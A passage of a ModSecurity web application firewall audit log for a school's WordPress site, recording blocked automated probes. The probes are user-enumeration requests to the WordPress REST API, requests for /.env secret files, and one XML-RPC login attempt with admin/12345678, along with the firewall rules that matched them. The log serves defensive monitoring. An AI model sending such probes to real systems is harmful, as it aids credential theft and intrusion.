%s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749831825574703 771 (- - -) Stopwatch2: 1749831825574703 771; combined=316, p1=277, p2=0, p3=0, p4=0, p5=38, sr=70, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f30a0304-Z-- --e80eef6e-A-- [13/Jun/2025:23:51:39 +0700] aExXGx1N9VxFJpQ5cVhwBwAAAIg 103.236.140.4 52180 103.236.140.4 8181 --e80eef6e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 3.218.116.207 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 3.218.116.207 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e80eef6e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e80eef6e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749833499156256 3082 (- - -) Stopwatch2: 1749833499156256 3082; combined=1313, p1=460, p2=823, p3=0, p4=0, p5=30, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e80eef6e-Z-- --9048230c-A-- [14/Jun/2025:01:15:31 +0700] aExqw8mhAKaFi0V9-RPw8AAAAMo 103.236.140.4 53398 103.236.140.4 8181 --9048230c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.141.90.211 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.141.90.211 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --9048230c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9048230c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749838531046380 2909 (- - -) Stopwatch2: 1749838531046380 2909; combined=1267, p1=435, p2=800, p3=0, p4=0, p5=32, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9048230c-Z-- --d370f802-A-- [14/Jun/2025:01:46:47 +0700] aExyF-9dCOerv4VGhqTmYQAAAAw 103.236.140.4 53538 103.236.140.4 8181 --d370f802-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.79.182.150 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.79.182.150 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d370f802-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d370f802-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749840407070386 3393 (- - -) Stopwatch2: 1749840407070386 3393; combined=1419, p1=467, p2=909, p3=0, p4=0, p5=43, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d370f802-Z-- --4f6fea66-A-- [14/Jun/2025:02:48:34 +0700] aEyAkh1N9VxFJpQ5cVhwZgAAAI8 103.236.140.4 55256 103.236.140.4 8181 --4f6fea66-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 84.44.64.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 84.44.64.222 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4f6fea66-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4f6fea66-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749844114254057 3137 (- - -) Stopwatch2: 1749844114254057 3137; combined=1339, p1=465, p2=845, p3=0, p4=0, p5=29, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4f6fea66-Z-- --c296fd41-A-- [14/Jun/2025:03:10:22 +0700] aEyFrsmhAKaFi0V9-RPycgAAAMk 103.236.140.4 59470 103.236.140.4 8181 --c296fd41-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 177.101.240.170 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 177.101.240.170 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c296fd41-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c296fd41-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749845422764199 2495 (- - -) Stopwatch2: 1749845422764199 2495; combined=1172, p1=374, p2=771, p3=0, p4=0, p5=27, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c296fd41-Z-- --62067f6a-A-- [14/Jun/2025:03:21:18 +0700] aEyIPh1N9VxFJpQ5cVh4RAAAAI0 103.236.140.4 35170 103.236.140.4 8181 --62067f6a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.59 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36 Accept-Charset: utf-8 --62067f6a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --62067f6a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749846078619941 688 (- - -) Stopwatch2: 1749846078619941 688; combined=257, p1=229, p2=0, p3=0, p4=0, p5=28, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --62067f6a-Z-- --5d0afb2b-A-- [14/Jun/2025:03:37:29 +0700] aEyMCf8ql0QLmijbYWZXXQAAAEA 103.236.140.4 40844 103.236.140.4 8181 --5d0afb2b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.59 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; F5321) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36 Accept-Charset: utf-8 --5d0afb2b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5d0afb2b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749847049893569 835 (- - -) Stopwatch2: 1749847049893569 835; combined=336, p1=293, p2=0, p3=0, p4=0, p5=43, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5d0afb2b-Z-- --c19ce864-A-- [14/Jun/2025:03:57:17 +0700] aEyQrWIDXuKmWNi2UBSvMQAAAFQ 103.236.140.4 42968 103.236.140.4 8181 --c19ce864-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.166.209.230 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.166.209.230 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c19ce864-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c19ce864-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749848237895558 2392 (- - -) Stopwatch2: 1749848237895558 2392; combined=1128, p1=354, p2=746, p3=0, p4=0, p5=27, sr=101, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c19ce864-Z-- --a9cd8109-A-- [14/Jun/2025:04:30:45 +0700] aEyYhUMWfhkd5Y0sFtrlXAAAAIg 103.236.140.4 48394 103.236.140.4 8181 --a9cd8109-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 38.254.177.232 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 38.254.177.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a9cd8109-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a9cd8109-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749850245940456 3235 (- - -) Stopwatch2: 1749850245940456 3235; combined=1359, p1=429, p2=899, p3=0, p4=0, p5=30, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a9cd8109-Z-- --65b80275-A-- [14/Jun/2025:04:39:29 +0700] aEyakWmwZ6YUkjOdtI6-PwAAAA4 103.236.140.4 48418 103.236.140.4 8181 --65b80275-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.29 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.29 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3880.0 Safari/537.36 Accept-Charset: utf-8 --65b80275-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --65b80275-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749850769379249 909 (- - -) Stopwatch2: 1749850769379249 909; combined=343, p1=301, p2=0, p3=0, p4=0, p5=42, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --65b80275-Z-- --c36b966a-A-- [14/Jun/2025:04:55:41 +0700] aEyeXWmwZ6YUkjOdtI6-TwAAABA 103.236.140.4 48518 103.236.140.4 8181 --c36b966a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 68.104.182.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 68.104.182.222 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c36b966a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c36b966a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749851741412390 3038 (- - -) Stopwatch2: 1749851741412390 3038; combined=1278, p1=415, p2=833, p3=0, p4=0, p5=30, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c36b966a-Z-- --52f4645d-A-- [14/Jun/2025:05:00:18 +0700] aEyfcmIDXuKmWNi2UBSweQAAAFg 103.236.140.4 48530 103.236.140.4 8181 --52f4645d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 43.165.196.164 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 43.165.196.164 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --52f4645d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --52f4645d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749852018380113 3650 (- - -) Stopwatch2: 1749852018380113 3650; combined=1522, p1=500, p2=984, p3=0, p4=0, p5=37, sr=82, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --52f4645d-Z-- --25f7bc2d-A-- [14/Jun/2025:05:02:31 +0700] aEyf92mwZ6YUkjOdtI6-VAAAAAM 103.236.140.4 48534 103.236.140.4 8181 --25f7bc2d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.216 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.216 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36 Accept-Charset: utf-8 --25f7bc2d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --25f7bc2d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749852151602465 834 (- - -) Stopwatch2: 1749852151602465 834; combined=341, p1=298, p2=0, p3=0, p4=0, p5=43, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --25f7bc2d-Z-- --c87c6470-A-- [14/Jun/2025:05:38:54 +0700] aEyofl3g_boun6Rx5jLL0QAAAMA 103.236.140.4 48696 103.236.140.4 8181 --c87c6470-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.58.159.139 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.58.159.139 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --c87c6470-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c87c6470-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749854334512606 933 (- - -) Stopwatch2: 1749854334512606 933; combined=342, p1=300, p2=0, p3=0, p4=0, p5=42, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c87c6470-Z-- --9adbe45f-A-- [14/Jun/2025:05:51:33 +0700] aEyrdWmwZ6YUkjOdtI6-eAAAAAw 103.236.140.4 48768 103.236.140.4 8181 --9adbe45f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.151 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.151 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.12pre) Gecko/20080122 Firefox/2.0.0.12pre --9adbe45f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9adbe45f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749855093926593 878 (- - -) Stopwatch2: 1749855093926593 878; combined=349, p1=307, p2=0, p3=0, p4=0, p5=42, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9adbe45f-Z-- --e9173d2b-A-- [14/Jun/2025:05:51:34 +0700] aEyrdmmwZ6YUkjOdtI6-eQAAAA4 103.236.140.4 48770 103.236.140.4 8181 --e9173d2b-B-- GET /.env.crt HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.151 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.151 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG-SM-N910A Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36 --e9173d2b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e9173d2b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749855094837362 764 (- - -) Stopwatch2: 1749855094837362 764; combined=293, p1=263, p2=0, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e9173d2b-Z-- --338c8b2e-A-- [14/Jun/2025:06:35:55 +0700] aEy122mwZ6YUkjOdtI6-sQAAABg 103.236.140.4 49022 103.236.140.4 8181 --338c8b2e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.193 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.193 X-Forwarded-Proto: https Connection: close User-Agent: Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52 Accept-Charset: utf-8 --338c8b2e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --338c8b2e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749857755564043 900 (- - -) Stopwatch2: 1749857755564043 900; combined=406, p1=363, p2=0, p3=0, p4=0, p5=43, sr=117, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --338c8b2e-Z-- --ce60ac1b-A-- [14/Jun/2025:07:53:37 +0700] aEzIEV3g_boun6Rx5jLNpwAAANc 103.236.140.4 56050 103.236.140.4 8181 --ce60ac1b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ce60ac1b-C-- wp.getUsersBlogs admin 12345678 --ce60ac1b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ce60ac1b-E-- --ce60ac1b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] 